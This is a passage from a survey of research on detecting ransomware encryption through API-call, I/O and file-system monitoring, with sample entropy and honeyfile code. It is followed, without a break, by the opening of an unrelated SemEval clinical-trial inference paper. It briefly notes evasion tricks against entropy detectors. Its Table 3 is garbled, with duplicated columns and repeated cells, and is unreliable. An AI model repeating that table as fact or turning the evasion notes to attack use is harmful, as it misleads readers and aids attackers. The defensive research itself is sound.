functions, were not described. API and system call monitoring is also widely used to provide input features in machine learning-based detection of activities in the Encryption phase. In their proposal, Al-Rimy et al. (2021) argue that feature extraction in the early Encryption phase of a ransomware attack and the phases before it creates a situation of too little data and high-dimensional features, leading to a substantial risk of overfitting. As a remedy, they proposed "a novel redundancy coefficient gradual up-weighting approach."

Table 2: A list of the most significant Windows API calls for crypto-ransomware detection, collected from the surveyed papers.

| API call | Description |
| --- | --- |
| FindFirstChangeNotificationA | Creates a change notification handle and sets up initial change notification filter conditions. A wait on a notification handle succeeds when a change matching the filter conditions occurs in the specified directory or subtree. |
| SHEmptyRecycleBinA | Empties the Recycle Bin on the specified drive. |
| SHFileOperation | Copies, moves, renames, or deletes a file system object. |
| SHBrowseForFolder | Displays a dialog box that enables the user to select a Shell folder. |
| SHLoadInProc | Creates an instance of the specified object class from within the context of the Shell's process. |
| SHGetFileInfo | Retrieves information about an object in the file system, such as a file, folder, directory, or drive root. |
| SHQueryRecycleBinA | Retrieves the total size of the Recycle Bin and the number of items in it, for a specified drive. |
| SHPathPrepareForWriteA | Checks to see if the path exists. This includes remounting mapped network drives, prompting for ejectable media to be reinserted, creating the paths, prompting for the media to be formatted, and providing the appropriate user interfaces, if necessary. |
| SetUserFileEncryptionKey | Sets the user's current key to the specified certificate. |
| EncryptFileA | Encrypts a file or directory. All data streams in a file are encrypted. All new files created in an encrypted directory are encrypted. |
| DecryptFileA | Decrypts an encrypted file or directory. |
| OpenEncryptedFileRawA | Opens an encrypted file in order to back up (export) or restore (import) the file. This group of Encrypting File System (EFS) functions is intended to implement backup and restore functionality while maintaining files in their encrypted state. |
| FileEncryptionStatusW | Retrieves the encryption status of the specified file. |

The calculation of redundancy terms of mutual information was introduced to improve the feature selection process and enhance the accuracy of the detection model. The experiment showed better accuracy with the proposed approach by testing multiple classifiers in all cases. Similarly, Hwang et al. (2020) propose a two-stage detection of crypto-ransomware, first building a Markov model from Windows API call sequence patterns capturing the characteristics of ransomware behavior and then using a Random Forest classifier over the remaining data (registry key operations, file system operations, strings, file extensions, directory operations, and dropped file extensions) to control false-positive and false-negative rates. Their two-stage mixed detection model gives 97.28% overall accuracy, a 4.83% false-positive rate, and a 1.47% false-negative rate. Also, Kok et al. (2020), as an extension to their already mentioned proposal of the Pre-encryption Detection Algorithm (PEDA), proposed a set of conventional and unconventional metrics for the performance of PEDA's learning algorithm (LA) component. By introducing metrics like Likelihood Ratio (LR), Diagnostic Odds Ratio (DOR), Youden's index (J), Number Needed to Diagnose (NND), Number Needed to Misdiagnose (NNM), and Net Benefit (NB), they improved the performance in this unique use case when compared to using only conventional metrics. Al-rimy et al. (2019) focused on pre-encryption activity detection in their proposal for a crypto-ransomware detection model. They proposed two combined approaches, an incremental bagging (iBagging) technique and enhanced semi-random subspace selection (ESRS), which act as an ensemble model. iBagging creates subsets depending on the observation of ransomware behavior, while ESRS then creates subspaces that are used to train a pool of classifiers. The best classifiers were modeled using a grid search, and a voting system was employed. While accuracy was higher than in competing approaches for the same datasets, there were limitations related to feature selection in different subspaces. Since the features were selected within each subspace independently, the same feature could be selected in more than one subspace, which decreases the accuracy of the model. Although this literature is well developed and ever-growing, it still lacks a comprehensive focus on researching the detection of Encryption phase-related activities in the case where encryption algorithms are custom-implemented using third-party libraries. The development of static analysis methods, as well as the discovery of patterns in API and system calls for dynamic analysis when a custom encryption implementation is used, would significantly improve the overall success of this method.

### I/O (input/output) monitoring

Monitoring I/O is another technique that monitors internal behavior in an operating system.
It aims to use information from I/O requests related to memory, the file system, and even the network for the detection of ransomware encryption (and other phases). Like API and system call monitoring, this technique is often part of a more comprehensive detection solution involving several different methodologies and techniques. Kharraz et al. (2016) used a combination of techniques and methodologies in their proposal for a detection system named UNVEIL. Their monitoring of I/O established that regular applications can generate I/O access requests similar to those generated by ransomware encryption tools. However, due to the common design where these regular applications do not block access to the original files, their sequence patterns of I/O operations differ from ransomware's. The paper also describes zero-day ransomware detection by observing the entropy difference between read and write operations. McIntosh et al. (2021), as part of a broader proposal for an access control framework, utilized I/O monitoring in various modules of the framework, named RANACO. Their solution nested its modules between the Windows I/O and storage class drivers. While the overall framework proposed has limitations, the I/O monitoring part is said to detect encryption successfully. RWGuard by Mehnaz et al. (2018) implements a hybrid solution with an IRParser that logs I/O requests and passes them further to other modules. Network monitoring is also used to detect pre-encryption and encryption events. Almashhadani et al. (2019) proposed network-based crypto-ransomware detection using Locky ransomware as the case study. Their proposal was built using multiple independent classifiers over both packet and flow data. Using a total of 18 features extracted from TCP, HTTP, DNS, and NBNS traffic, the proposal achieved 97.92% accuracy for packet-based and 97.08% accuracy for flow-based data. By using TCP and UDP features computed from network flows, Fernandez Maimo et al. (2019), as a continuation of their previous proposal for an integrated clinical environment named ICE++, proposed a machine learning detection and protection system capable of anomaly detection and ransomware classification. It also uses Network Function Virtualization (NFV) and Software-Defined Networking (SDN) paradigms to prevent the spread of crypto-ransomware activity. They trained multiple models using multiple algorithms and achieved a precision/recall of 92.32%/99.97% in anomaly detection and an accuracy of 99.99% in ransomware classification. Roy and Chen (2021) proposed a solution named DeepRan that prevents the spreading of the Encryption phase across network-connected computers. DeepRan utilizes an attention-based bidirectional Long Short-Term Memory (BiLSTM) network with a fully connected layer to model the normalcy of networked hosts. Its behavior anomaly detection processes substantial amounts of logging data collected from bare-metal servers. A Conditional Random Fields (CRF) model was used to extend the BiLSTM so that detected anomalies could be classified as potential ransomware attacks. Semantic information extraction from "high dimensional host logging data" was done with the Term Frequency-Inverse Document Frequency (TF-IDF) method. Early ransomware detection had a 99.87% detection accuracy (F1-score of 99.02%). On the hardware monitoring level, Paik et al. (2016) propose monitoring I/O for encryption detection in addition to their SSD hardware monitoring.
Similarly, Dimov and Toshev (2020) monitor HDD performance and utilize the I/O performance rate for disk read and disk write operations to detect ransomware in the Encryption phase. Finally, as a unique type of I/O monitoring, Park and Park (2020) propose hardware tracing for the detection of symmetric-key cryptographic routines in malicious binaries that employ anti-reverse engineering techniques. Azmoodeh et al. (2018) proposed detecting crypto-ransomware activity in IoT by monitoring power consumption and applying machine learning models to the collected data. Their proposal employs Dynamic Time Warping (DTW) as a distance measure with KNN as a classifier, outperforming conventional classifiers like Neural Networks, KNN, and SVM. Their approach achieved a detection rate of 95.65% and a precision rate of 89.19%. Only a few research papers are available that include I/O monitoring in relation to detecting activities of the Encryption phase of a ransomware attack. The success of some of the mentioned proposals in detecting encryption as an activity, and the overall events that are a consequence of the Encryption phase, indicates that much more can be done in this field and that more innovative hybrid solutions are possible.

### File system monitoring

Monitoring file system activity to detect the Encryption phase of ransomware attacks focuses on collecting information about the state of the file system and the files themselves. Early ideas, like that of Young et al. (2012) to use distinct sector hashes to detect target files, including encrypted files, paved the way for file system usage in the fight against cryptographic ransomware. Using raw binary files as ML features, Khammas (2020) proposed a Random Forest classifier that uses 1000 n-gram features extracted directly from raw bytes using frequent pattern mining. The selection of features was made using the Gain Ratio to reduce the dimensionality of the feature set. The proposal found the optimal number of trees to be 100, with an achieved accuracy of 97.74%. While this proposal focused on the analysis of binaries that contain ransomware attack tools and on recognizing them among benign binaries, due to the nature of crypto-ransomware behavior it is safe to assume that many of the n-gram features were related to the Encryption phase. Furthermore, using APK files containing the source code of an Android app, Sharma et al. (2021) extracted features from the file related to ransomware attacks. Their proposal, named RansomDroid, for detecting crypto-ransomware activity on Android devices, uses an unsupervised machine learning model. Rather than K-Means clustering, the proposal used a Gaussian Mixture Model, a more flexible and probabilistic approach to modeling the dataset. Feature selection and dimensionality reduction for improvement of the model were also utilized. The model detects Android ransomware with an accuracy of 98.08% in 44 ms. Almomani et al. (2021) also use analysis of Android APK files for feature extraction in their proposal. They rely on an "evolutionary-based machine learning approach" to detect cryptographic ransomware. The solution uses a binary particle swarm optimization algorithm (BPSO) to tune the classifier's hyperparameters and for feature selection. The synthetic minority oversampling technique (SMOTE) with the support vector machine (SVM) algorithm was used for classification. The combination, named SMOTE-tBPSO-SVM, used g-mean as a metric and achieved a result of 97.5%. Tang et al.
(2020) proposed a detection and prevention system named RansomSpector that monitors file system and network activities. It is a virtual machine-based system that resides in the hypervisor, thus making it difficult to bypass through privilege escalation. Crypto-ransomware was detected with very little performance overhead (less than 5%). Continella et al. (2016), in their proposal for ShieldFS, offer a whole new file system which, combined with the machine learning portion of their proposal, can detect ransomware behavior as an anomaly, including operations related to the Encryption phase. Similarly, Lee et al. (2022) proposed statistical analysis to differentiate between regular and encrypted blocks in the file system. Their solution, Rcryptect, utilizes extracted heuristic rules using FUSE (Filesystem in Userspace) to avoid kernel modification. Rcryptect, among other methods, detects high-entropy files created by cryptographic operations. Nevertheless, the solution faces the common issues of false positives for benign files with high entropy and of prevention mechanisms that can cause damage to some files under attack before the ransomware encryption process is killed. Entropy, in combination with fuzzy hashing, as a means to detect files encrypted by ransomware in the file system was proposed by Joshi et al. (2021). They used a mini-filter driver that interacts with file system behavior in kernel mode. While achieving more than 95% detection success in their experiment, the method is susceptible to explorer.exe process DLL injection that would bypass the proposed security measures. Lee et al. (2019) use entropy estimation to detect files encrypted by ransomware in a cloud environment. When using the cloud as a backup, there exists a risk that encrypted files could be synchronized to the cloud. The authors thus observed a number of ransomware encryption attacks and established the baseline used in entropy estimation over files in the cloud. Their experiment reported a 100% success rate in detecting encryption. Jung and Won (2018) used the entropy of files in their comprehensive ransomware detection and protection system. They utilized context-aware analysis that used information from APIs, file system metadata, systems to detect large-scale read/write operations, and entropy analysis capable of detecting benign usage of encryption, with enhanced classification to improve entropy analysis results. Similarly, Jethva et al. (2020) proposed their system to detect and prevent crypto-ransomware using entropy in multilayer detection. The technique was combined with monitoring registry key operations, file signatures in the Windows operating system, and machine learning. Improving on the already mentioned method of analyzing the entropy of files, Hsu et al. (2021) examined 22 different file formats of encrypted files and extracted features to be used with the Support Vector Machine algorithm. They achieved a detection rate of 85.17% using the linear SVM model, which increased to over 92% when using the SVM kernel trick (with the polynomial kernel). Not all of the research favors entropy use in detecting ransomware encryption. McIntosh et al. (2019) propose deprecation of this method in the fight against ransomware, arguing that the techniques they identified to mitigate entropy usage in encryption detection are sufficient to invalidate reliance on entropy information.
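For reference, the quantity that all of these entropy-based approaches (and McIntosh et al.'s critique of them) revolve around is the byte-level Shannon entropy of a buffer, which approaches 8 bits per byte for well-encrypted data. A minimal reference implementation is sketched below; the 7.5 bits-per-byte threshold is an illustrative assumption, and, as noted above, compressed or encoded data can also score high, which is the source of the false positives.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Byte-level Shannon entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_encrypted(data: bytes, threshold: float = 7.5) -> bool:
    # Ciphertext is close to uniformly random, so its entropy approaches 8.0;
    # compressed archives and media files can also exceed this threshold,
    # which is why entropy is usually only one signal among several.
    return shannon_entropy(data) >= threshold

print(looks_encrypted(b"AAAA" * 1024), looks_encrypted(bytes(range(256)) * 16))
```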
In their experiment, Base64 encoding and partial file encryption showed their effectiveness in "confusing" entropy information; thus, the usage of file integrity and file type identification has been proposed as an alternative to using entropy measures. RWGuard is a proposal by Mehnaz et al. (2018) that combines multiple techniques in the real-time detection of cryptographic ransomware. The solution includes monitoring the file system for malicious activity through File Monitoring and File Classification modules. It also has the capability to automatically generate decoy files in the file system using a feature called the Decoy Files Generator. Some of the techniques used for detection are inherently probabilistic and prone to false positives. Another decoy-in-the-file-system-based solution is the proposal of R-Locker by Gomez-Hernandez et al. (2018), a novel approach to creating _honeyfiles_ as decoys to detect and stop ransomware in action. To achieve this in a practical implementation on UNIX-like operating systems, a new named pipe is created in the file system containing a specially crafted small-size honeyfile, and an alert is raised to kill the process when ransomware attempts to read the file (a minimal sketch of this mechanism is given below). Because the kernel manages synchronization between reading and writing on the pipe, if a process attempts to read more data than is available, the read is blocked until a writer supplies the expected data. This feature allows time to raise alerts about suspected ransomware behavior. In another approach using deception, honeypots for IoT devices were proposed by Sibi Chakravarthy et al. (2020), based on the Social Leopard Algorithm (SoLA), to model honey folders. The Intrusion Detection Honeypot (IDH) also introduces an Audit Watch module that monitors the entropy of files on the device, together with a module called Complex Event Processing (CEP) that collects information from multiple external security sources used to confirm and stop ransomware activity. The SoLA algorithm is critical to this proposal, with its capabilities to process extracted features from processes that accessed the honey folder. Usage of entropy to detect encryption is present in various operating systems, including Android. A proposal by Jiao et al. (2021) detects custom encryption on Android platforms with an accuracy rate of 98.24% using only entropy information. In a more ML-focused approach, using activity logs that contain all of the filesystem events for feature extraction, Homayoun et al. (2020) proposed applying Sequential Pattern Mining to find Maximal Frequent Patterns (MFP) in logged activities for known ransomware. This created candidate features to be used in classification by multiple machine learning classification algorithms. In their experiment, the authors used J48, Random Forest, Bagging, and Multi-Layer Perceptron (MLP) classifiers and achieved an F-measure of 0.994 with a minimum AUC value of 0.99 in separating ransomware samples from benign activities using Windows registry, DLL, and file system activity logs. They also reported an F-measure of more than 0.98 with a false-positive rate of less than 0.007 in the detection of a given ransomware family, using 13 selected features whose significance was recognized during the research. Their results were impressive, creating datasets of ransomware logs for 1624 ransomware binaries sourced from virustotal.com, as well as separate sampling to control for overfitting.
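To make the R-Locker-style decoy concrete, the sketch below shows one way such a honeyfile watcher could be structured on a UNIX-like system. It is purely illustrative: the path, polling interval, and response action are assumptions, and it is not the implementation described by Gomez-Hernandez et al. The watcher exploits the fact that opening a FIFO write-only in non-blocking mode fails with ENXIO unless some process currently has it open for reading.

```python
import errno
import os
import time

HONEYFILE = "/tmp/decoys/.passwords.txt"   # hypothetical decoy path

os.makedirs(os.path.dirname(HONEYFILE), exist_ok=True)
if not os.path.exists(HONEYFILE):
    os.mkfifo(HONEYFILE)                   # the decoy is a named pipe, not a regular file

while True:
    try:
        # This open succeeds only if another process has the FIFO open for
        # reading, e.g. ransomware enumerating and reading every file it finds.
        fd = os.open(HONEYFILE, os.O_WRONLY | os.O_NONBLOCK)
        os.close(fd)
        print("ALERT: decoy honeyfile opened for reading")  # hook response/kill logic here
    except OSError as exc:
        if exc.errno != errno.ENXIO:       # ENXIO means no reader is present, i.e. all quiet
            raise
    time.sleep(0.5)
```

Meanwhile, the reading process itself stays blocked waiting for data that never arrives, which is the property the original proposal uses to stall the ransomware thread while the alert is handled.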
However, Homayoun et al. give no indication that testing was performed on an independent dataset. Even though an impressive amount of research has been found in relation to file system monitoring for the purpose of detecting Encryption phase activities in a ransomware attack, we feel that very little research has gone in the direction of tying the techniques mentioned above into the access control systems used to govern file systems. Entropy detection is a promising tool in fighting cryptographic ransomware; more proposals are needed on this topic.

### Commercial solutions brief survey

Most of the commercial offering for protection against crypto-ransomware focuses on providing capabilities in the area of Enterprise Backup and Recovery. Companies that focus solely on ransomware protection in their products are almost nonexistent. Many vendors focus on delivering recovery capabilities through air-gapped backups and immutable backup copies, and detection is based chiefly on integrity and anomaly behavior monitoring. Even though vendors market their offerings as comprehensive data protection solutions, it is indicative that most of them emphasize that the backup is the last line of defense against ransomware, which in some instances indicates that other ransomware protection controls are expected to be in place for the product to live up to its expectations. According to Gartner's Magic Quadrant for Enterprise Backup and Recovery Software Solutions (Rao et al., 2021), the major capability for the evaluation of a product was ransomware detection and protection. An example is Acronis (Ransomware Protection with Backup for Business - Acronis), which offers both cloud-based and on-premise solutions that include the capability to actively scan for ransomware activity and verify the authenticity and recoverability of backup copies. Another major player in this field is Arcserve (Ransomware Protection Solution for an Impenetrable Business), which does not have its own capabilities to detect and protect against crypto-ransomware built into its product but rather has close cooperation with security giant Sophos, which provides that capability for them. Cohesity (Ransomware Recovery | Reduce Downtime with Rapid Recovery) is a leader in enterprise backup and recovery. They offer a cloud service with immutable backups using the write-once-read-many (WORM) feature and an RBAC access control model. They also utilize machine learning for anomaly behavior detection to detect crypto-ransomware activity. Commvault (Ransomware Recovery - Commvault) offers one of the most comprehensive lists of capabilities against ransomware. Their approach employs a zero-trust model, with an architecture built using NIST's Cybersecurity Framework (CSF). Their detection capability mostly relies on anomaly detection in both networks and file systems. Dell Technologies (Dell EMC Cyber Recovery Solution - Cyber and Ransomware Data Recovery), another leader in this vertical, provides detection using their Intelligent CyberSense Analytics, which utilizes machine learning for anomaly detection. Other important vendors and leaders in this area, like Veeam (Ransomware Protection: Learn How Veeam Can Protect Your Data) and Rubrik (Ransomware Recovery), use similar techniques, and there are no serious differentiating factors in detecting crypto-ransomware. Other groups of vendors that focus on ransomware detection are traditional threat detection and response companies.
They rely on anomaly detection utilizing various monitoring techniques that provide hybrid solutions of API call monitoring, I/O monitoring, and file system change monitoring. Some use machine learning models, and there are occasional claims of artificial intelligence (AI) that are difficult to confirm. The most significant ones are Carbon Black (Endpoint Protection Platform | VMware Carbon Black Endpoint), Trend Micro (Enterprise Ransomware Protection & Removal), Darktrace (Darktrace for Ransomware), Extrahop (Ransomware Mitigation & Detection Solution - ExtraHop), and Vectra AI (Ransomware Detection and Response - Ransomware Solutions | Vectra AI). Concerning the relationship between academic research achievements surrounding the detection of ransomware executing pre-encryption and encryption activities and commercial solutions, it has been noted and observed that an apparent discrepancy exists between the two (Scala et al., 2019; Nicol et al., 2015). The persistence of these differences is not uncommon in cybersecurity-related topics and has been driven by a series of factors that can be branched into three categories: technical, procedural, and bureaucratic in origin and nature. Amongst those most substantially addressed by the literature are the factors identified as distinctly technical in origin:

* Integration. Industry solutions utilize different detection methods and measures in a coordinated schema of safeguards, where a comprehensive set of firewalls, intrusion prevention systems, and endpoint protection defenses is adopted to combat real-world threats. In contrast, the academic approach necessitates the separation of specific detection techniques and their study in isolation, in effect obscuring how they translate into practice.
* Scalability. Detection solutions developed in an isolated academic environment tend to struggle to provide monitoring and analysis capabilities for the vast amounts of data generated by modern industry networks (Scala et al., 2019). Since the complexity and diversity of commercial networks are not to be understated, scaling assumes an integral role in the application of research outcomes in the real-world market (Nicol et al., 2015).
* Complexity. The algorithms developed through mechanisms of academic inquiry often involve complex and resource-intensive modi operandi, which fail to be practical for real-world deployment or, by the nature of their construction, cannot evolve into more flexible setups (Nicol et al., 2012).
* Adaptability. With standardized models built on specific ransomware samples and behavior patterns used to train academically developed technologies, limitations arise in adaptability for real-world applications (Scala et al., 2019). Ransomware, in real-world attacks, rarely follows the uniformity established in these test models. On the contrary, its behavior constantly evolves in a race to outmaneuver newly forged preventative measures as they emerge.

Likewise, while procedural factors present similar practical limitations as those found with technical factors, the core of these limitations lies in qualities inherent to the experimental process and research objectives rather than market translation:

* Validation. The process of testing and validation notably differs across academic and industry borders. Research validation roots itself in the accuracy of simulations and the control of experimental conditions.
Commercial solutions require rigorous real-world validation against various extraneous variables and incorporation into existing infrastructure to ensure effectiveness, reliability, and compatibility (Grossman et al., 2001; Nicol et al., 2015).

* False positives. In research, false positives are typically addressed only to the extent needed to achieve high detection rates (Bold et al., 2022; Kok et al., 2020). Comparatively, greater emphasis is placed on false positives in the industrial context, as the losses incurred through the resultant disruptions are of greater interest. Hence, commercial solutions seek a compromise between adequate detection accuracy and minimizing false positives.
* Time to market. Rapid response is necessary to combat the emergence rate of new threats and meet the demands of the commercial market. Concurrently, academic research development, testing, and refinement require heavy time investments for the analytic procedure, translating to a natural lag behind the pace of ransomware evolution (Kashef et al., 2023; Nicol et al., 2015).

In contrast to technical and procedural factors, which are determined by objectively measurable discrepancies, bureaucratic factors are interpretational, based on institutional inefficiencies of anthropogenic origin. The most notable of these present themselves as restrictions of:

* Intellectual property and licensing. Hesitancy in adopting newly developed technologies based on academic research is often directly tied to the risks involved with an investment in new IP where precedents have yet to be set on the extent of its protected status. Similar contingencies arise with licensing restrictions that introduce additional expenditures in the form of permissions and approvals.

### Other applications of detection of encryption

Detection of encryption is not always related to cryptographic ransomware defense. There are numerous use cases where it would be necessary to recognize whether encryption happened or is happening. An example is the proposal of Ameeno et al. (2019), which uses the Naive Bayes algorithm to differentiate between compression and encryption and to identify file types. Li and Liu (2020) proposed an encryption detection method using deep convolutional neural networks (CNN). The proposal converts raw data into two-dimensional matrices used as input to the CNN. The results showed a higher detection rate than competing storage and network encryption detection methods. In another proposal that utilizes the power of machine learning and deep learning, Yang et al. (2021) propose the usage of natural language processing (NLP) in combination with the two for detecting encrypted network traffic. The technique usually used for weighting in message retrieval and keyword extraction, Term Frequency-Inverse Document Frequency (TF-IDF), was used in modeling detection because it does not require analysis of each field in the network traffic. Both ensembles of various machine learning classifiers and CNNs were used, each with high accuracy and its own advantages. The advantage of the CNN in deep learning is that it efficiently deals with the sparse matrices (compressed or uncompressed) generated by TF-IDF in situations where there is an "abundance" of hardware resources. On the other hand, encrypted traffic detection with limited hardware resources is better suited to ensemble classifiers. Finally, even though somewhat similar to crypto-ransomware encryption detection, a proposal by Dong et al.
(2021), named MBTree, deals with the detection of encrypted traffic between a Remote Access Trojan (RAT) and a Command & Control (C2) server. The proposal relies on building a baseline by integrating flow-level DirPiz sequences into a synthesized host-level Multi-Level Tree (MLTree). Detection is then done by measuring the path similarity and node similarity of actual traffic against the baseline. The reported F1 score is 94%.

## 4 Conclusion

In closing, our journey through the myriad proposals relating to the detection of pre-encryption and encryption activities by cryptographic ransomware has surfaced some findings and lessons learned. The dynamic nature of ransomware necessitates constant vigilance, innovation, and adaptation. Each of the surveyed methodologies has its own advantages and disadvantages. This is why we present section 4.1, Lessons learned. Our findings in section 4.2 underscore the importance of multi-layered, robust detection mechanisms and the need for more research focusing on encryption as the major motivation for the attack. We hope this analysis serves as a catalyst for further advancements and a guidepost for future endeavors in combating cryptographic ransomware.

### Lessons learned

In this paper, we reviewed cryptographic ransomware from the perspective of what we believe is its differentiating factor from other families of cyberattacks, namely encryption. Here we summarize the lessons learned in this survey. Foremost, crypto-ransomware is an increasing threat that cripples critical capabilities of both public and commercial services for extended periods of time. When we add the amounts of paid ransoms, losses are in the tens of millions of dollars. Attacks could even result in loss of human life, taking into consideration ransomware groups' "taste" for medical facilities during the COVID-19 pandemic, or become part of cyber warfare. Secondly, researchers have seen a discrepancy in describing and categorizing ransomware, ranging from plain malware to sophisticated cyber kill chains representing the activity of sophisticated APT-like threat actors. We observed ransomware through our own cyber kill chain. Thirdly, from a research perspective, we have seen many proposals dealing with different aspects of crypto-ransomware, and most of them take a hybrid approach to deliver the solution. Fourthly, we have seen that despite the academic community's mature and focused research, commercial solutions mainly apply machine learning and anomaly detection solutions. Finally, we have seen that specialized research around the problem of encryption detection and general control of encryption operations is in the apparent minority among the research topics into crypto-ransomware. Overall, there is no one-size-fits-all answer to the most effective approach. The effectiveness of each method depends on the specific ransomware and its behavior. Combining all approaches with machine learning may offer the best defense against ransomware attacks. Adding behavioral analysis and user awareness to that increases effectiveness significantly. The information in Table 3 summarizes the pros and cons of each methodology, providing the argument for the advantage of a hybrid approach. These conclusions result from a review and study of the different proposals presented in this survey and our research into commercial solutions that offer capabilities that could be used to detect pre-encryption and encryption activities by ransomware attacks.
### Main findings We focused on the Encryption phase described in our cyber kill chain and divided various methodologies into three major groups: * API and system call monitoring-based detection * I/O monitoring-based detection * file system monitoring-based detection Reviewing the work of researchers through the prism of those three detection methodologies, it was not surprising that, in the case of complete proposals for detection, researchers preferred a hybrid approach utilizing primarily combinations of the three or fewer methodologies, with machine learning being the preferred tool in many proposals. Most of the research was focused on Windows operating systems, but Android mobile operating systems and a variety of Internet of Things applications were also present in the reviewed work. The overall conclusion of this survey is that more methods and techniques described in the surveyed research efforts should be utilized in real-life products by trying to remove some of the common obstacles already described. Detecting pre-encryption and encryption activities provides a high level of confidence that ransomware can be intercepted before doing severe damage. Introducing some benchmark methods in the detection of encryption along \begin{table} \begin{tabular}{p{142.3pt} p{142.3pt} p{142.3pt} p{142.3pt}} \hline Methodology & Pros & Cons & Cons & Effectiveness \\ \hline API and system call monitoring-based detection & It provides real-time detection, as systems calls and APIs are used during the ransomware’s activities. It can reveal information about the ransomware’s inner workings, which may aid in further developing or fine-tuning the countermeasures. It can be combined with other detection techniques for increased accuracy. Enables the identification of specific attack vectors and potentially vulnerable system components. & False positives may arise due to benign software with similar system call patterns. & This approach can be highly effective because ransomware often uses specific system calls and APIs to access and manipulate files. Monitoring for unusual patterns in these calls can help identify ransomware activities. & This approach can be highly effective because ransomware often uses specific system calls and APIs to access and manipulate files. Monitoring for unusual patterns in these calls can help identify ransomware activities. & This approach can be highly effective because ransomware often uses specific system calls and APIs to access and manipulate files. Monitoring for unusual patterns in these calls can help identify ransomware activities. & This approach can be highly effective because ransomware often uses specific system calls and APIs to access and manipulate files. Monitoring for unusual patterns in these calls can help identify ransomware activities. & This approach can be highly effective, as ransomware typically generates high 1/0 activity while encrypting large numbers of files. \\ \hline I/O monitoring-based detection & It can be used as an early warning system, as I/O spikes might indicate ongoing ransomware activity. It can be less resource-intensive compared to monitoring system calls and APIs. It can detect ransomware even if it uses unconventional or previously unseen system calls and APIs, if the I/O patterns are consistent with encryption activities. Reatively easier to implement compared to monitoring system calls and APIs. Allows for the identification of affected files and systems, enabling targeted response and recovery efforts. 
& This approach is moderately effective, as ransomware typically generates significant I/O activity while encrypting large numbers of files. & This approach is moderately effective, as ransomware typically generates high I/O activity while encrypting large numbers of files. \\ \hline Filesystems monitoring-based detection & It allows ransomware detection based on its unique file manipulation behavior. It can provide insights into the ransomware's encryption strategy, aiding in decryption and recovery efforts. It can detect ransomware that employs file-level encryption, which is a common feature in many ransomware strains. It can help identify the specific encryption algorithms used by ransomware, which may aid in decryption efforts. It provides opportunities for early intervention, as filesystem-related activities typically occur before actual encryption. & It may produce false positives due to benign applications with similar filesystem-related activities. & This approach can be highly effective, as ransomware often exhibits specific file access and modification patterns, such as renaming files, changing file extensions, or modifying file attributes. \\ \hline \end{tabular} \end{table} Table 3: Pros, Cons and Effectiveness of different methodologies for detecting ransomware's pre-encryption and encryption activities. with appropriate datasets is a desperate need in this area of research.

## Declaration of Competing Interest

The authors declare that they have no known competing financial interests or personal relationships that could have appeared to influence the work reported in this paper.

## CRediT authorship contribution statement

**Kenan Begovic:** Conceptualization, Methodology, Formal analysis, Resources, Writing - original draft, Writing - review & editing. **Abdulaziz Al-Ali:** Conceptualization, Validation, Writing - review & editing, Supervision. **Qutaibah Malluhi:** Conceptualization, Validation, Writing - review & editing, Supervision.

**Data availability** No data was used for the research described in the article.
2305.02993
SemEval-2023 Task 7: Multi-Evidence Natural Language Inference for Clinical Trial Data
This paper describes the results of SemEval 2023 task 7 -- Multi-Evidence Natural Language Inference for Clinical Trial Data (NLI4CT) -- consisting of 2 tasks, a Natural Language Inference (NLI) task, and an evidence selection task on clinical trial data. The proposed challenges require multi-hop biomedical and numerical reasoning, which are of significant importance to the development of systems capable of large-scale interpretation and retrieval of medical evidence, to provide personalized evidence-based care. Task 1, the entailment task, received 643 submissions from 40 participants, and Task 2, the evidence selection task, received 364 submissions from 23 participants. The tasks are challenging, with the majority of submitted systems failing to significantly outperform the majority class baseline on the entailment task, and we observe significantly better performance on the evidence selection task than on the entailment task. Increasing the number of model parameters leads to a direct increase in performance, far more significant than the effect of biomedical pre-training. Future works could explore the limitations of large models for generalization and numerical inference, and investigate methods to augment clinical datasets to allow for more rigorous testing and to facilitate fine-tuning. We envisage that the dataset, models, and results of this task will be useful to the biomedical NLI and evidence retrieval communities. The dataset, competition leaderboard, and website are publicly available.
Maël Jullien, Marco Valentino, Hannah Frost, Paul O'Regan, Donal Landers, André Freitas
2023-05-04T16:58:19Z
http://arxiv.org/abs/2305.02993v2
# SemEval-2023 Task 7: Multi-Evidence Natural Language Inference for Clinical Trial Data

###### Abstract

This paper describes the results of SemEval 2023 task 7 - Multi-Evidence Natural Language Inference for Clinical Trial Data (NLI4CT) - consisting of 2 tasks, a Natural Language Inference (NLI) task, and an evidence selection task on clinical trial data. The proposed challenges require multi-hop biomedical and numerical reasoning, which are of significant importance to the development of systems capable of large-scale interpretation and retrieval of medical evidence, to provide personalized evidence-based care. Task 1, the entailment task, received 643 submissions from 40 participants, and Task 2, the evidence selection task, received 364 submissions from 23 participants. The tasks are challenging, with the majority of submitted systems failing to significantly outperform the majority class baseline on the entailment task, and we observe significantly better performance on the evidence selection task than on the entailment task. Increasing the number of model parameters leads to a direct increase in performance, far more significant than the effect of biomedical pre-training. Future works could explore the limitations of large models for generalization and numerical inference, and investigate methods to augment clinical datasets to allow for more rigorous testing and to facilitate fine-tuning. We envisage that the dataset, models, and results of this task will be useful to the biomedical NLI and evidence retrieval communities. The dataset1, competition leaderboard2, and website3 are publicly available. Footnote 1: [https://github.com/ai-systems/nli4ct](https://github.com/ai-systems/nli4ct) Footnote 2: [https://codalab.lism.upsaclay.fr/competitions/8937#learn_the_details](https://codalab.lism.upsaclay.fr/competitions/8937#learn_the_details) Footnote 3: [https://sites.google.com/view/nli4ct/](https://sites.google.com/view/nli4ct/)

## 1 Introduction

Clinical trials are indispensable for experimental medicine as they test the efficacy and safety of novel treatments (Avis et al., 2006). Clinical Trial Reports (CTRs) are documents that detail the methodology and results of a trial, implemented to guide personalized and targeted interventions for patients. However, there are 400,000+ published CTRs, with an increasing number being published every year (Bastian et al., 2010), making it impractical to manually carry out comprehensive evaluations of all the relevant literature when designing new treatment protocols (DeYoung et al., 2020). To address this challenge, Natural Language Inference (NLI) (Bowman et al., 2015; Devlin et al., 2019) offers a potential solution for the large-scale interpretation and retrieval of medical evidence, to support a higher level of precision and efficiency in personalized evidence-based care (Sutton et al., 2020). SemEval-2023 Task 7 - Multi-Evidence Natural Language Inference for Clinical Trial Data (NLI4CT) - is based on the NLI4CT dataset, which contains 2 tasks on breast cancer CTRs, shown in Figure 1: firstly, to determine the inference relation between a natural language statement and a CTR; secondly, to retrieve supporting facts from the CTR(s) to justify the predicted relation.

